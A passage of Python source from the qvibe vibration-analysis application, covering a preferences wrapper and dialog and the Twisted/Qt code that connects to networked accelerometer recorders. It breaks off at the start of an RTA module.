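The tests above also document how the handlers compose in normal use: an `AsyncHandler` dispatching to a blocking sink on a worker thread. A hedged sketch (the output directory is a placeholder):
```python
import tempfile

from qvibe.handler import AsyncHandler, CSVLogger

# Compose the chain the tests verify: async dispatch in front of a CSV sink.
output_dir = tempfile.mkdtemp()  # placeholder location
handler = AsyncHandler(delegate=CSVLogger('owner', output_dir))
handler.handle([{'d': 'd0', 'b': 'b0'}])  # lands in <output_dir>/owner/data.out
```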
{
"source": "3ll3d00d/qvibe",
"score": 2
} |
#### File: python/model/preferences.py
```python
import os
import numpy as np
import qtawesome as qta
from qtpy.QtCore import Qt
from qtpy.QtWidgets import QDialog, QMessageBox, QDialogButtonBox, QFileDialog
from common import parse_file, np_to_str
from ui.preferences import Ui_preferencesDialog
DISPLAY_SMOOTH_GRAPHS = 'display/smooth_graphs'
STYLE_MATPLOTLIB_THEME_DEFAULT = 'beq_dark'
STYLE_MATPLOTLIB_THEME = 'style/matplotlib_theme'
LOGGING_LEVEL = 'logging/level'
SCREEN_GEOMETRY = 'screen/geometry'
SCREEN_WINDOW_STATE = 'screen/window_state'
SYSTEM_CHECK_FOR_UPDATES = 'system/check_for_updates'
SYSTEM_CHECK_FOR_BETA_UPDATES = 'system/check_for_beta_updates'
RECORDER_TARGET_FS = 'recorder/target/fs'
RECORDER_TARGET_SAMPLES_PER_BATCH = 'recorder/target/samples_per_batch'
RECORDER_TARGET_ACCEL_ENABLED = 'recorder/target/accel_enabled'
RECORDER_TARGET_ACCEL_SENS = 'recorder/target/accel_sens'
RECORDER_TARGET_GYRO_ENABLED = 'recorder/target/gyro_enabled'
RECORDER_TARGET_GYRO_SENS = 'recorder/target/gyro_sens'
RECORDER_SAVED_IPS = 'recorder/saved_ips'
BUFFER_SIZE = 'buffer/size'
ANALYSIS_RESOLUTION = 'analysis/resolution'
ANALYSIS_TARGET_FS = 'analysis/target_fs'
ANALYSIS_WINDOW_DEFAULT = 'Default'
ANALYSIS_AVG_WINDOW = 'analysis/avg_window'
ANALYSIS_PEAK_WINDOW = 'analysis/peak_window'
ANALYSIS_DETREND = 'analysis/detrend'
ANALYSIS_HPF_RTA = 'analysis/hpfrta'
CHART_MAG_MIN = 'chart/mag_min'
CHART_MAG_MAX = 'chart/mag_max'
CHART_FREQ_MIN = 'chart/freq_min'
CHART_FREQ_MAX = 'chart/freq_max'
CHART_SPECTRO_SCALE_FACTOR = 'chart/spectro/scale_factor'
CHART_SPECTRO_SCALE_ALGO = 'chart/spectro/scale_algo'
SUM_X_SCALE = 'sum/x_scale'
SUM_Y_SCALE = 'sum/y_scale'
SUM_Z_SCALE = 'sum/z_scale'
WAV_DOWNLOAD_DIR = 'wav/download_dir'
SNAPSHOT_GROUP = 'snapshot'
RTA_TARGET = 'rta/target'
RTA_HOLD_SECONDS = 'rta/hold_secs'
RTA_SMOOTH_WINDOW = 'rta/smooth_window'
RTA_SMOOTH_POLY = 'rta/smooth_poly'
DEFAULT_PREFS = {
ANALYSIS_RESOLUTION: 1.0,
ANALYSIS_TARGET_FS: 1000,
ANALYSIS_AVG_WINDOW: ANALYSIS_WINDOW_DEFAULT,
ANALYSIS_PEAK_WINDOW: ANALYSIS_WINDOW_DEFAULT,
ANALYSIS_DETREND: 'constant',
ANALYSIS_HPF_RTA: False,
BUFFER_SIZE: 30,
CHART_MAG_MIN: 40,
CHART_MAG_MAX: 120,
CHART_FREQ_MIN: 1,
CHART_FREQ_MAX: 125,
CHART_SPECTRO_SCALE_FACTOR: '8x',
CHART_SPECTRO_SCALE_ALGO: 'Lanczos',
DISPLAY_SMOOTH_GRAPHS: True,
RECORDER_TARGET_FS: 500,
RECORDER_TARGET_SAMPLES_PER_BATCH: 8,
RECORDER_TARGET_ACCEL_ENABLED: True,
RECORDER_TARGET_ACCEL_SENS: 4,
RECORDER_TARGET_GYRO_ENABLED: False,
RECORDER_TARGET_GYRO_SENS: 500,
RTA_HOLD_SECONDS: 10.0,
RTA_SMOOTH_WINDOW: 31,
RTA_SMOOTH_POLY: 7,
SUM_X_SCALE: 2.2,
SUM_Y_SCALE: 2.4,
SUM_Z_SCALE: 1.0,
STYLE_MATPLOTLIB_THEME: STYLE_MATPLOTLIB_THEME_DEFAULT,
SYSTEM_CHECK_FOR_UPDATES: True,
SYSTEM_CHECK_FOR_BETA_UPDATES: False,
WAV_DOWNLOAD_DIR: os.path.join(os.path.expanduser('~'), 'Music'),
}
TYPES = {
ANALYSIS_RESOLUTION: float,
ANALYSIS_TARGET_FS: int,
ANALYSIS_HPF_RTA: bool,
BUFFER_SIZE: int,
CHART_MAG_MIN: int,
CHART_MAG_MAX: int,
CHART_FREQ_MIN: int,
CHART_FREQ_MAX: int,
DISPLAY_SMOOTH_GRAPHS: bool,
RECORDER_TARGET_FS: int,
RECORDER_TARGET_SAMPLES_PER_BATCH: int,
RECORDER_TARGET_ACCEL_ENABLED: bool,
RECORDER_TARGET_ACCEL_SENS: int,
RECORDER_TARGET_GYRO_ENABLED: bool,
RECORDER_TARGET_GYRO_SENS: int,
RTA_HOLD_SECONDS: float,
RTA_SMOOTH_POLY: int,
RTA_SMOOTH_WINDOW: int,
SUM_X_SCALE: float,
SUM_Y_SCALE: float,
SUM_Z_SCALE: float,
SYSTEM_CHECK_FOR_UPDATES: bool,
SYSTEM_CHECK_FOR_BETA_UPDATES: bool,
}
singleton = None
class Preferences:
def __init__(self, settings):
self.__settings = settings
global singleton
singleton = self
def has(self, key):
'''
checks for existence of a value.
:param key: the key.
:return: True if we have a value.
'''
return self.get(key) is not None
def get(self, key, default_if_unset=True):
'''
Gets the value, if any.
:param key: the settings key.
:param default_if_unset: if true, return a default value.
:return: the value.
'''
default_value = DEFAULT_PREFS.get(key, None) if default_if_unset is True else None
value_type = TYPES.get(key, None)
if value_type is not None:
return self.__settings.value(key, defaultValue=default_value, type=value_type)
else:
return self.__settings.value(key, defaultValue=default_value)
def enter(self, key):
self.__settings.beginGroup(key)
def get_children(self):
return self.__settings.childKeys()
def get_child_groups(self):
return self.__settings.childGroups()
def exit(self):
self.__settings.endGroup()
def get_all(self, prefix):
'''
Get all values with the given prefix.
:param prefix: the prefix.
:return: the values, if any.
'''
self.__settings.beginGroup(prefix)
try:
return set(filter(None.__ne__, [self.__settings.value(x) for x in self.__settings.childKeys()]))
finally:
self.__settings.endGroup()
def set(self, key, value):
'''
sets a new value.
:param key: the key.
:param value: the value.
'''
if value is None:
self.__settings.remove(key)
else:
self.__settings.setValue(key, value)
def clear_all(self, prefix):
''' clears all under the given group '''
self.__settings.beginGroup(prefix)
self.__settings.remove('')
self.__settings.endGroup()
def clear(self, key):
'''
Removes the stored value.
:param key: the key.
'''
self.set(key, None)
def reset(self):
'''
Resets all preferences.
'''
self.__settings.clear()
class PreferencesDialog(QDialog, Ui_preferencesDialog):
'''
Allows user to set some basic preferences.
'''
def __init__(self, preferences, style_root, recorder_store, spectro, parent=None):
super(PreferencesDialog, self).__init__(parent)
self.__style_root = style_root
self.__recorder_store = recorder_store
self.setupUi(self)
self.__preferences = preferences
self.__spectro = spectro
self.__should_clear_target = False
self.__new_target = None
self.buttonBox.button(QDialogButtonBox.RestoreDefaults).clicked.connect(self.__reset)
self.checkForUpdates.setChecked(self.__preferences.get(SYSTEM_CHECK_FOR_UPDATES))
self.checkForBetaUpdates.setChecked(self.__preferences.get(SYSTEM_CHECK_FOR_BETA_UPDATES))
self.xScale.setValue(self.__preferences.get(SUM_X_SCALE))
self.yScale.setValue(self.__preferences.get(SUM_Y_SCALE))
self.zScale.setValue(self.__preferences.get(SUM_Z_SCALE))
self.magMin.setValue(self.__preferences.get(CHART_MAG_MIN))
self.magMax.setValue(self.__preferences.get(CHART_MAG_MAX))
self.highpassRTA.setChecked(self.__preferences.get(ANALYSIS_HPF_RTA))
self.init_combo(ANALYSIS_DETREND, self.detrend, lambda a: f"{a[0].upper()}{a[1:]}")
self.magMin.valueChanged['int'].connect(self.__balance_mag)
self.magMax.valueChanged['int'].connect(self.__balance_mag)
self.freqMin.setValue(self.__preferences.get(CHART_FREQ_MIN))
self.freqMax.setValue(self.__preferences.get(CHART_FREQ_MAX))
self.freqMin.valueChanged['int'].connect(self.__balance_freq)
self.freqMax.valueChanged['int'].connect(self.__balance_freq)
self.wavSaveDir.setText(self.__preferences.get(WAV_DOWNLOAD_DIR))
self.spectroScaleAlgo.setCurrentText(self.__preferences.get(CHART_SPECTRO_SCALE_ALGO))
self.spectroScaleFactor.setCurrentText(self.__preferences.get(CHART_SPECTRO_SCALE_FACTOR))
self.wavSaveDirPicker.setIcon(qta.icon('fa5s.folder-open'))
self.addRecorderButton.setIcon(qta.icon('fa5s.plus'))
self.deleteRecorderButton.setIcon(qta.icon('fa5s.times'))
enable_delete = False
if self.__preferences.get(RECORDER_SAVED_IPS) is not None:
ips = self.__preferences.get(RECORDER_SAVED_IPS).split('|')
for ip in ips:
self.recorders.addItem(ip)
enable_delete = True
else:
self.recorderIP.setFocus(Qt.OtherFocusReason)
self.deleteRecorderButton.setEnabled(enable_delete)
self.addRecorderButton.setEnabled(False)
self.__reset_target_buttons()
self.clearTarget.setIcon(qta.icon('fa5s.times', color='red'))
self.loadTarget.setIcon(qta.icon('fa5s.folder-open'))
self.createTarget.setIcon(qta.icon('fa5s.bezier-curve'))
self.createTarget.setToolTip('Draw a target curve')
self.createTarget.clicked.connect(self.__create_target)
def __reset_target_buttons(self):
has_target = self.__preferences.has(RTA_TARGET)
self.clearTarget.setEnabled(has_target)
self.targetSet.setChecked(has_target)
def __create_target(self):
from model.target import CreateTargetDialog
dialog = CreateTargetDialog(self, self.__preferences, fs=self.__preferences.get(RECORDER_TARGET_FS))
dialog.exec()
self.__reset_target_buttons()
def __balance_mag(self, val):
keep_range(self.magMin, self.magMax, 10)
def __balance_freq(self, val):
keep_range(self.freqMin, self.freqMax, 10)
def validate_ip(self, ip):
valid_ip = self.__is_valid_ip(ip)
existing_ip = self.recorders.findText(ip, Qt.MatchExactly)
self.addRecorderButton.setEnabled(valid_ip and existing_ip == -1)
def add_recorder(self):
self.recorders.addItem(self.recorderIP.text())
self.recorderIP.clear()
def delete_recorder(self):
idx = self.recorders.currentIndex()
if idx > -1:
self.recorders.removeItem(idx)
self.deleteRecorderButton.setEnabled(self.recorders.count() > 0)
def clear_target(self):
'''
Clears any RTA target.
'''
self.__should_clear_target = True
self.__new_target = None
self.targetSet.setChecked(False)
def load_target(self):
'''
Allows user to select an FRD file to set the target.
'''
parsers = {'frd': self.__parse_frd, 'txt': self.__parse_frd}
_, data = parse_file('FRD (*.frd *.txt)', 'Load Target', parsers)
self.__new_target = data
self.targetSet.setChecked(data is not None)
@staticmethod
def __is_valid_ip(ip):
''' checks if the string is a valid ip:port. '''
tokens = ip.split(':')
if len(tokens) == 2:
ip_tokens = tokens[0].split('.')
if len(ip_tokens) == 4:
try:
first, *nums = [int(i) for i in ip_tokens]
if 0 < first <= 255:
if all(0 <= i <= 255 for i in nums):
return 0 < int(tokens[1]) < 65536
except Exception:
pass
return False
def __reset(self):
'''
Reset all settings
'''
result = QMessageBox.question(self,
'Reset Preferences?',
f"All preferences will be restored to their default values. This action is irreversible.\nAre you sure you want to continue?",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if result == QMessageBox.Yes:
self.__preferences.reset()
self.alert_on_change('Defaults Restored')
self.reject()
def init_combo(self, key, combo, translater=lambda a: a):
'''
Initialises a combo box from either settings or a default value.
:param key: the settings key.
:param combo: the combo box.
:param translater: a lambda to translate from the stored value to the display name.
'''
stored_value = self.__preferences.get(key)
idx = -1
if stored_value is not None:
idx = combo.findText(translater(stored_value))
if idx != -1:
combo.setCurrentIndex(idx)
def accept(self):
'''
Saves the locations if they exist.
'''
self.__preferences.set(SYSTEM_CHECK_FOR_UPDATES, self.checkForUpdates.isChecked())
self.__preferences.set(SYSTEM_CHECK_FOR_BETA_UPDATES, self.checkForBetaUpdates.isChecked())
self.__preferences.set(SUM_X_SCALE, self.xScale.value())
self.__preferences.set(SUM_Y_SCALE, self.yScale.value())
self.__preferences.set(SUM_Z_SCALE, self.zScale.value())
self.__preferences.set(WAV_DOWNLOAD_DIR, self.wavSaveDir.text())
self.__preferences.set(CHART_MAG_MIN, self.magMin.value())
self.__preferences.set(CHART_MAG_MAX, self.magMax.value())
self.__preferences.set(CHART_FREQ_MIN, self.freqMin.value())
self.__preferences.set(CHART_FREQ_MAX, self.freqMax.value())
self.__preferences.set(CHART_SPECTRO_SCALE_ALGO, self.spectroScaleAlgo.currentText())
self.__preferences.set(CHART_SPECTRO_SCALE_FACTOR, self.spectroScaleFactor.currentText())
self.__preferences.set(ANALYSIS_DETREND, self.detrend.currentText().lower())
self.__preferences.set(ANALYSIS_HPF_RTA, self.highpassRTA.isChecked())
# TODO would be nicer to be able to listen to specific values
self.__spectro.update_scale()
if self.recorders.count() > 0:
ips = [self.recorders.itemText(i) for i in range(self.recorders.count())]
self.__preferences.set(RECORDER_SAVED_IPS, '|'.join(ips))
self.__recorder_store.load(ips)
else:
self.__preferences.clear(RECORDER_SAVED_IPS)
self.__recorder_store.clear()
if self.__should_clear_target is True:
self.__preferences.clear(RTA_TARGET)
if self.__new_target is not None:
self.__preferences.set(RTA_TARGET, self.__new_target)
QDialog.accept(self)
def pick_save_dir(self):
dir_name = QFileDialog.getExistingDirectory(self, 'Export WAV', self.wavSaveDir.text(),
QFileDialog.ShowDirsOnly)
if len(dir_name) > 0:
self.wavSaveDir.setText(dir_name)
@staticmethod
def alert_on_change(title, text='Change will not take effect until the application is restarted',
icon=QMessageBox.Warning):
msg_box = QMessageBox()
msg_box.setText(text)
msg_box.setIcon(icon)
msg_box.setWindowTitle(title)
msg_box.exec()
@staticmethod
def __parse_frd(file_name):
'''
Reads an FRD file and converts it into x,y vals but returns the raw txt (i.e. we validate the data on load).
:param file_name: the file.
:return: file_name, the frd as an ndarray in str format.
'''
if file_name is not None:
comment_char = None
with open(file_name) as f:
c = f.read(1)
if not c.isalnum():
comment_char = c
f, m = np.genfromtxt(file_name, comments=comment_char, unpack=True, usecols=(0, 1))
arr = np.vstack((f, m))
return file_name, np_to_str(arr)
return None, None
def keep_range(min_widget, max_widget, span):
if min_widget.value() + span >= max_widget.value():
min_widget.setValue(max_widget.value() - span)
if max_widget.value() - span <= min_widget.value():
max_widget.setValue(min_widget.value() + span)
```
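`Preferences` is a thin typed wrapper over `QSettings`; a minimal usage sketch, assuming this module's constants import as shown (the organisation and application names are placeholders):
```python
from qtpy.QtCore import QSettings

from model.preferences import Preferences, RECORDER_TARGET_FS, BUFFER_SIZE, RTA_TARGET

prefs = Preferences(QSettings('acme', 'qvibe-analyser'))  # placeholder names
fs = prefs.get(RECORDER_TARGET_FS)  # falls back to DEFAULT_PREFS (500), typed as int
prefs.set(BUFFER_SIZE, 60)          # stored via QSettings.setValue
if prefs.has(RTA_TARGET):
    prefs.clear(RTA_TARGET)         # removes the stored value
```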
#### File: python/model/recorders.py
```python
import json
import logging
import math
import time
from collections.abc import Sequence
import numpy as np
import qtawesome as qta
from qtpy import QtWidgets
from qtpy.QtCore import QObject, Signal, QThreadPool
from qtpy.QtWidgets import QMessageBox
from twisted.internet.protocol import connectionDone
from twisted.protocols.basic import LineReceiver
from common import RingBuffer
from model.log import to_millis
logger = logging.getLogger('qvibe.recorders')
class RecorderSignals(QObject):
on_status_change = Signal(str, bool)
class Recorder:
def __init__(self, ip_address, idx, parent_layout, parent, target_config, reactor):
''' Adds widgets to the main screen to display another recorder. '''
self.__ip_address = ip_address
self.__target_config = target_config
self.signals = RecorderSignals()
self.__reset_on_snap = False
self.__name = None
self.__reactor = reactor
self.__listener = None
self.__snap_idx = 0
self.__buffer = []
self.__parent_layout = parent_layout
# init the widgets on screen which control it
self.__recorder_layout = QtWidgets.QVBoxLayout()
self.__recorder_layout.setObjectName(f"recorders_layout_{idx}")
self.__connect_button = QtWidgets.QPushButton(parent)
self.__connect_button.setText('Connect')
self.__connect_button.setObjectName(f"connect_recorder_button_{idx}")
self.__connect_button.clicked.connect(self.connect)
self.__connect_button.setIcon(qta.icon('fa5s.sign-in-alt'))
self.__disconnect_button = QtWidgets.QPushButton(parent)
self.__disconnect_button.setText('Disconnect')
self.__disconnect_button.setObjectName(f"disconnect_recorder_button_{idx}")
self.__disconnect_button.clicked.connect(self.disconnect)
self.__disconnect_button.setIcon(qta.icon('fa5s.sign-out-alt'))
self.__disconnect_button.setEnabled(False)
self.__ip_address_label = QtWidgets.QLabel(parent)
self.__ip_address_label.setObjectName(f"ip_address_{idx}")
self.__ip_address_label.setText(ip_address)
self.__connected = QtWidgets.QCheckBox(parent)
self.__connected.setObjectName(f"connected_{idx}")
self.__connected.setText('Connected?')
self.__connected.setEnabled(False)
self.__recording = QtWidgets.QCheckBox(parent)
self.__recording.setObjectName(f"recording_{idx}")
self.__recording.setText('Recording?')
self.__recording.setEnabled(False)
self.__button_layout = QtWidgets.QHBoxLayout()
self.__recorder_layout.addWidget(self.__ip_address_label)
self.__button_layout.addWidget(self.__connect_button)
self.__button_layout.addWidget(self.__disconnect_button)
self.__recorder_layout.addLayout(self.__button_layout)
self.__checkbox_layout = QtWidgets.QHBoxLayout()
self.__checkbox_layout.addWidget(self.__connected)
self.__checkbox_layout.addWidget(self.__recording)
self.__recorder_layout.addLayout(self.__checkbox_layout)
self.__parent_layout.addLayout(self.__recorder_layout)
def __handle_status_change(self):
''' Updates various fields to reflect recorder status. '''
is_connected = self.__connected.isChecked()
self.__connect_button.setEnabled(not is_connected)
self.__disconnect_button.setEnabled(is_connected)
self.signals.on_status_change.emit(self.ip_address, is_connected)
@property
def ip_address(self):
return self.__ip_address
@property
def name(self):
return self.__name
@property
def target_config(self):
return self.__target_config
@target_config.setter
def target_config(self, target_config):
if target_config != self.__target_config:
self.__target_config = target_config
if self.__listener is not None:
self.__listener.signals.send_target.emit(target_config)
@property
def connected(self):
return self.__connected.isChecked()
@connected.setter
def connected(self, connected):
if connected != self.__connected.isChecked():
logger.info(f"Connected state changing from {self.__connected.isChecked()} to {connected}")
self.__connected.setChecked(connected)
self.__handle_status_change()
@property
def recording(self):
return self.__recording.isChecked()
@recording.setter
def recording(self, recording):
if recording != self.__recording.isChecked():
logger.info(f"Recording state changing from {self.__recording.isChecked()} to {recording}")
self.__recording.setChecked(recording)
def connect(self):
''' Creates a RecorderListener if required and then connects it. '''
logger.info(f"Connecting to {self.ip_address}")
if self.__listener is None:
self.__listener = RecorderTwistedBridge(self.__reactor)
self.__listener.signals.on_socket_state_change.connect(self.__on_state_change)
self.__listener.signals.on_data.connect(self.__handle_data)
self.__listener.ip = self.ip_address
if self.connected is False:
self.__reactor.callFromThread(self.__listener.connect)
def __on_state_change(self, new_state):
'''
Reacts to connection state changes to determine if we are connected or not
propagates that status via a signal
'''
if new_state == 1:
self.connected = True
else:
self.connected = False
self.recording = False
if new_state != 0:
msg_box = QMessageBox()
msg_box.setText(f"Failed to connect to: \n\n {self.ip_address}")
msg_box.setIcon(QMessageBox.Critical)
msg_box.setWindowTitle('Connection Failed')
msg_box.exec()
def __handle_data(self, data):
'''
Main protocol handler which can react to data updates by recording them in the buffer and config updates by
validating device state to enable recording to start or sending new config if required.
'''
rcv = data
cmd = rcv[0:3]
dat = data[4:]
if cmd == 'DAT':
if self.recording is True:
if len(dat) > 0:
records = np.array([np.array(r.split('#'), dtype=np.float64) for r in dat.split('|')])
if records.size > 0:
logger.debug(f"Buffering DAT {records[0,0]} - {records[-1,0]}")
# if the last record has a sample idx less than the first one then it must have suffered an overflow
if len(self.__buffer) > 0 and records[:, 0][-1] <= records[:, 0][0]:
logger.error(f"Sensor {self.ip_address} has overflowed")
self.__reset_on_snap = True
self.__buffer.extend(records)
else:
logger.error(f"Received empty array {dat}")
self.__reset_on_snap = True
else:
logger.error(f"Received empty array {dat}")
self.__reset_on_snap = True
elif cmd == 'DST':
logger.info(f"Received DST {dat}")
if RecorderConfig.from_dict(json.loads(dat)[0]) == self.__target_config:
self.recording = True
else:
self.recording = False
self.__listener.signals.send_target.emit(self.__target_config)
elif cmd == 'STR':
pass
elif rcv == 'ERROR':
logger.error(f"Received ERROR from {self.ip_address}")
self.__reset_on_snap = True
else:
logger.error(f"Received unknown payload from {self.ip_address} - {rcv}")
def disconnect(self):
''' Disconnects the listener if we have one. '''
if self.__listener is not None:
logger.info(f"Disconnecting from {self.ip_address}")
self.__listener.kill()
self.__listener = None
QThreadPool.globalInstance().releaseThread()
logger.info(f"Disconnected from {self.ip_address}")
def snap(self):
'''
:return: a 4 entry tuple with
- the ip of the recorder
- data since the last snap
- the snap idx
- whether the sensor has overflowed since the last snap
'''
errored = self.__reset_on_snap
if self.__reset_on_snap is True:
self.__reset_on_snap = False
start = time.time()
b = np.array(self.__buffer)
self.__buffer = []
self.__snap_idx += 1
end = time.time()
logger.debug(f"Snap {self.__snap_idx} : {b.shape[0]} in {to_millis(start, end)}ms")
return self.ip_address, b, self.__snap_idx, errored
def reset(self):
self.__buffer = []
def destroy(self):
logger.info(f"Destroying {self.ip_address}")
self.disconnect()
self.signals.disconnect()
self.__parent_layout.removeItem(self.__recorder_layout)
def replace(self, data):
'''
Replaces the current data with the supplied data. Intended to be used by loading.
:param data: the data.
'''
self.reset()
self.__buffer.extend(data)
class RecorderStore(Sequence):
'''
Stores all recorders known to the system.
'''
def __init__(self, target_config, parent_layout, parent, reactor, measurement_store):
self.signals = RecorderSignals()
self.__measurement_store = measurement_store
self.__parent_layout = parent_layout
self.__spacer_item = QtWidgets.QSpacerItem(20, 40,
QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Expanding)
self.__parent_layout.addItem(self.__spacer_item)
self.__parent = parent
self.__recorders = []
self.__target_config = target_config
self.__reactor = reactor
@property
def target_config(self):
return self.__target_config
@target_config.setter
def target_config(self, target_config):
self.__target_config = target_config
for r in self:
r.target_config = target_config
def append(self, ip_address):
''' adds a new recorder. '''
self.__parent_layout.removeItem(self.__spacer_item)
rec = Recorder(ip_address, len(self.__recorders), self.__parent_layout, self.__parent, self.__target_config,
self.__reactor)
self.__parent_layout.addItem(self.__spacer_item)
rec.signals.on_status_change.connect(self.__on_recorder_connect_event)
self.__recorders.append(rec)
return rec
def replace(self, ip, data):
rec = next((r for r in self if r.ip_address == ip), None)
if rec is None:
logger.info(f"Loading new recorder at {ip}")
rec = self.append(ip)
rec.replace(data)
def load(self, ip_addresses):
''' Creates recorders for all given IP addresses. '''
for ip in ip_addresses:
if next((r for r in self if r.ip_address == ip), None) is None:
logger.info(f"Loading new recorder at {ip}")
self.append(ip)
self.__measurement_store.append('rta', ip, None)
to_remove = [r for r in self if r.ip_address not in ip_addresses]
for r in to_remove:
logger.info(f"Discarding recorder from {r.ip_address}")
self.__recorders.remove(r)
self.__measurement_store.remove('rta', r.ip_address)
r.destroy()
def clear(self):
''' eliminates all recorders '''
self.load([])
def __getitem__(self, i):
return self.__recorders[i]
def __len__(self):
return len(self.__recorders)
def snap(self, connected_only=True):
'''
:return: current data for each recorder.
'''
return [r.snap() for r in self if connected_only is False or r.connected is True]
def reset(self):
''' clears all cached data. '''
for rec in self:
rec.reset()
def __on_recorder_connect_event(self, ip, connected):
'''
propagates a recorder status change.
:param ip: the ip.
:param connected: if it is connected.
'''
self.signals.on_status_change.emit(ip, connected)
def any_connected(self):
'''
:return: True if any recorded is connected.
'''
return any(r.connected is True for r in self)
def connect(self):
''' connects all recorders '''
for r in self:
r.connect()
def disconnect(self):
''' disconnects all recorders '''
for r in self:
r.disconnect()
class RecorderConfig:
def __init__(self):
self.__fs = None
self.__value_len = 2
self.__samples_per_batch = None
self.__accelerometer_enabled = False
self.__accelerometer_sens = None
self.__gyro_enabled = False
self.__gyro_sens = None
def to_dict(self):
return {
'fs': self.fs,
'sPB': self.samples_per_batch,
'aOn': self.accelerometer_enabled,
'aSens': self.accelerometer_sens,
'gOn': self.gyro_enabled,
'gSens': self.gyro_sens
}
@staticmethod
def from_dict(d):
rc = RecorderConfig()
if 'fs' in d:
rc.__fs = d['fs']
if 'sPB' in d:
rc.__samples_per_batch = d['sPB']
if 'aOn' in d:
rc.__accelerometer_enabled = d['aOn']
if 'aSens' in d:
rc.__accelerometer_sens = d['aSens']
if 'gOn' in d:
rc.__gyro_enabled = d['gOn']
if 'gSens' in d:
rc.__gyro_sens = d['gSens']
return rc
@property
def fs(self):
return self.__fs
@fs.setter
def fs(self, fs):
self.__fs = fs
@property
def samples_per_batch(self):
return self.__samples_per_batch
@samples_per_batch.setter
def samples_per_batch(self, samples_per_batch):
self.__samples_per_batch = samples_per_batch
@property
def accelerometer_enabled(self):
return self.__accelerometer_enabled
@accelerometer_enabled.setter
def accelerometer_enabled(self, accelerometer_enabled):
self.__accelerometer_enabled = accelerometer_enabled
@property
def accelerometer_sens(self):
return self.__accelerometer_sens
@accelerometer_sens.setter
def accelerometer_sens(self, accelerometer_sens):
self.__accelerometer_sens = accelerometer_sens
self.__recalc_len()
@property
def gyro_enabled(self):
return self.__gyro_enabled
@gyro_enabled.setter
def gyro_enabled(self, gyro_enabled):
self.__gyro_enabled = gyro_enabled
self.__recalc_len()
@property
def gyro_sens(self):
return self.__gyro_sens
@gyro_sens.setter
def gyro_sens(self, gyro_sens):
self.__gyro_sens = gyro_sens
def __recalc_len(self):
self.__value_len = 2 \
+ (3 if self.accelerometer_enabled else 0) \
+ (3 if self.gyro_enabled else 0)
@property
def value_len(self):
return self.__value_len
def __eq__(self, other):
if not isinstance(other, RecorderConfig):
return NotImplemented
return self.fs == other.fs \
and self.samples_per_batch == other.samples_per_batch \
and self.accelerometer_enabled == other.accelerometer_enabled \
and self.accelerometer_sens == other.accelerometer_sens \
and self.gyro_enabled == other.gyro_enabled \
and self.gyro_sens == other.gyro_sens
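# Illustrative round trip (not part of the original source): __handle_data
# compares the DST payload against target_config via this equality, e.g.
#   cfg = RecorderConfig()
#   cfg.fs = 500
#   assert RecorderConfig.from_dict(cfg.to_dict()) == cfg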
class RecorderSocketBridgeSignals(QObject):
on_socket_state_change = Signal(int)
on_data = Signal(str)
send_target = Signal(RecorderConfig)
class RecorderTwistedBridge:
def __init__(self, reactor):
super().__init__()
self.__reactor = reactor
self.__ip = None
self.signals = RecorderSocketBridgeSignals()
self.__endpoint = None
self.__protocol = None
self.__connect = None
self.__state = 0
self.signals.send_target.connect(self.__send_target_state)
@property
def ip(self):
return self.__ip
@ip.setter
def ip(self, ip):
self.__ip = ip
def connect(self):
''' Runs the twisted reactor. '''
from twisted.internet.endpoints import TCP4ClientEndpoint
from twisted.internet.endpoints import connectProtocol
logger.info(f"Starting Twisted endpoint on {self.ip}")
ip, port = self.ip.split(':')
self.__endpoint = TCP4ClientEndpoint(self.__reactor, ip, int(port))
self.__protocol = RecorderProtocol(self.signals.on_data, self.__on_state_change)
self.__connect = connectProtocol(self.__endpoint, self.__protocol)
self.__reactor.callLater(1, self.__cancel_if_not_connected)
def __cancel_if_not_connected(self):
if self.__state != 1:
logger.info(f"Cancelling connection to {self.ip} on timeout")
self.__connect.cancel()
self.__on_state_change(2)
self.kill()
self.__on_state_change(0)
def __on_state_change(self, new_state):
''' socket connection state change handler '''
if self.__state != new_state:
logger.info(f"Connection state change from {self.__state} to {new_state}")
self.__state = new_state
self.signals.on_socket_state_change.emit(new_state)
def __send_target_state(self, target_state):
''' writes a SET command to the socket. '''
msg = f"SET|{json.dumps(target_state.to_dict())}\r\n'".encode()
logger.info(f"Sending {msg} to {self.ip}")
self.__protocol.write(msg)
logger.info(f"Sent {msg} to {self.ip}")
def kill(self):
''' Tells the reactor to stop running and disconnects the socket. '''
if self.__protocol is not None:
if self.__protocol.transport is not None:
logger.info("Stopping the twisted protocol")
self.__protocol.transport.loseConnection()
logger.info("Stopped the twisted protocol")
elif self.__connect is not None:
logger.info("Cancelling connection attempt")
self.__reactor.callFromThread(self.__connect.cancel)
logger.info("Cancelled connection attempt")
class RecorderProtocol(LineReceiver):
''' Bridges the twisted network handler to/from Qt signals. '''
def __init__(self, on_data, on_state_change):
super().__init__()
self.__on_data = on_data
self.__on_state_change = on_state_change
def rawDataReceived(self, data):
pass
def connectionMade(self):
logger.info("Connection established, sending state change")
self.transport.setTcpNoDelay(True)
self.__on_state_change(1)
def connectionLost(self, reason=connectionDone):
logger.info(f"Connection lost because {reason}, sending state change")
self.__on_state_change(0)
def lineReceived(self, line):
logger.debug("Emitting DAT")
self.__on_data.emit(line.decode())
def write(self, line):
''' writes a SET command to the socket. '''
logger.debug("Sending SET")
self.sendLine(line)
```
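`__handle_data` above implies a simple line protocol: a three-letter command, a `|` separator, then `|`-delimited records whose fields are `#`-separated floats. A standalone sketch of the DAT parse path (the sample line is invented):
```python
import numpy as np

# Invented example line; real recorders send a sample idx plus sensor values.
line = 'DAT|1#0.01#-0.02#0.98|2#0.02#-0.01#0.99'
cmd, dat = line[0:3], line[4:]
assert cmd == 'DAT'
records = np.array([np.array(r.split('#'), dtype=np.float64)
                    for r in dat.split('|')])
print(records.shape)  # (2, 4): two samples, idx plus three axes
```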
#### File: python/model/rta.py
```python
import logging
import math
import numpy as np
import pyqtgraph as pg
import qtawesome as qta
from qtpy import QtWidgets, QtCore
from qtpy.QtWidgets import QMessageBox
from qtpy.QtCore import Qt
from common import format_pg_plotitem, block_signals, FlowLayout
from model.charts import VisibleChart, ChartEvent
from model.frd import ExportDialog
from model.preferences import RTA_TARGET, RTA_HOLD_SECONDS, RTA_SMOOTH_WINDOW, RTA_SMOOTH_POLY, ANALYSIS_HPF_RTA
from model.signal import smooth_savgol, Analysis, TriAxisSignal, REF_ACCELERATION_IN_G
TARGET_PLOT_NAME = 'Target'
logger = logging.getLogger('qvibe.rta')
class RTAEvent(ChartEvent):
